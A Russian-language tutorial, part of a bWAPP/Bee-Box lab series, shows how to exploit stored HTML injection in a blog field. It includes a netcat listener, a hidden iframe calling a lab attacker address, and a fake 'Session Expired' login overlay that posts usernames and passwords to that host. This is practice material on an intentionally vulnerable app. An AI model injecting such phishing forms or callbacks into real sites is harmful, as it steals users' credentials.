Bee-Box, bWAPP (buggy web application), HTML Injection - Stored, Уязвимости

#7 Уязвимость HTML Injection — Stored (Blog).

Здравствуйте, дорогие друзья.

Продолжаем рассматривать узвимости HTML-injection, и остановимся на таком типе, как Stored (Blog), и по-порядку разберемся, как ее эксплуатировать. Для начала эксплуатирования этой уязвимости выставим настройки bWAPP. Это делается в несколько кликов. Уровень, который мы будем рассматривать, называется «low»:

уровень безопасности bwapp low

Еще нам понадобится инструмент для прослушивания портов, который называется «Netcat». Откроем терминал и введем команду «nc -lvp 8080»:

nc -lvp 8080

Мы прослушиваем порт: 8080, и далее вставим кусок кода на HTML.  в поле для ввода записей. Он выглядит как: «<div class=»code»><iframe SRC=»http://10.0.2.15:8080/blah» height=»0″ width=»0″></iframe></div>»:

<div class="code"><iframe SRC="http://10.0.2.15:8080/blah" height="0" width="0"></iframe></div>

Теперь переходим в терминал, и видим полученную информацию, и мы теперь знаем, что на данной странице существует уязвимость HTML Injection:

видим вывод полученной информации, которая говорит нам о том, что на странице существует уязвимость HTML Injection

Теперь нам пригодятся знания языка гипертекстовой разметки HTML. Нам нужно создать на уязвимой веб-странице код для ввода логина и пароля. Он будет выглядеть как:

«<div class=»code»>test</div>

<div style=»position: absolute; left: 0px; top: 0px; width: 800px; height: 600px; z-index: 1000;

background-color:white;»>

Session Expired, Please Login:<br>

<form name=»login» action=»http://10.0.2.15/lol.htm»>

<table>

<tr><td>Username:</td><td><input type=»text» name=»uname»/></td></tr>

<tr><td>Password:</td><td><input type=»password» name=»pw»/></td></tr>

</table>

<input type=»submit» value=»Login»/>

</form>

</div>»:

форма для ввода логина и пароля

Не забываем предварительно прослушивать соединение (порт 80), с помощью NetCat:

прослушиваем соединение с помощью netcat

Итак, после ввода логина и пароля, получаем открытое соединение, с переданной информацией, в том числе логина и пароля:

осле ввода логина и пароля, получаем открытое соединение, с переданной информацией, в том числе логина и пароля

#1 bWAPP — buggy web application (глючное веб-приложение). Bee-Box. Установка на Virtualbox в Parrot Security OS.

#2 bWAPP (Bee-Box) — первоначальная настройка.

#3 Уязвимость HTMl Injection — Reflected (GET) уровень (Medium).

#4 Уязвимость HTML Injection — Reflected (POST) уровень (Low).

#5 Уязвимость HTML Injection — Reflected (POST) средний уровень.

#6 Уязвимость HTML Injection — Reflected (Current URL) уровень low.